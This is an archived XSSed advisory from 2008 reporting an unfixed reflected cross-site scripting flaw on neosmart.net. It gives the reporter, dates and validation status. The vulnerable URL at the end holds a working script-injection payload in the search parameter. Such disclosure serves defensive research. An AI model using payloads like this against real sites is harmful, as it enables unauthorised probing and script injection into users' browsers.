Unfixed XSS vulnerability at neosmart.net

2008-05-13T00:00:00
ID XSSED:38423
Type xssed
Reporter C1c4Tr1Z
Modified 2008-06-20T00:00:00

Description

Security researcher C1c4Tr1Z, has submitted on 13/05/2008 a cross-site-scripting (XSS) vulnerability affecting neosmart.net, which at the time of submission ranked 32265 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://neosmart.net/search.php?domains=neosmart.net&q="><script>alert('C1c4Tr1Z')</script>&sa=Go&sitesearch=neosmart.net&client=pub-5619864238989802&forid=1&channel=5924079665&ie=UTF-8&oe=UTF-8&flav=0000&sig=TeF8lRDSuEsYfoxO&cof=GALT%3A%23728C40%3BGL%3A1%3BDIV%3A%23999999%3BVLC%3A336633%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3AFF9900%3BALC%3A0066CC%3BLC%3A0066CC%3BT%3A000000%3BGFNT%3A666666%3BGIMP%3A666666%3BFORID%3A11&hl=en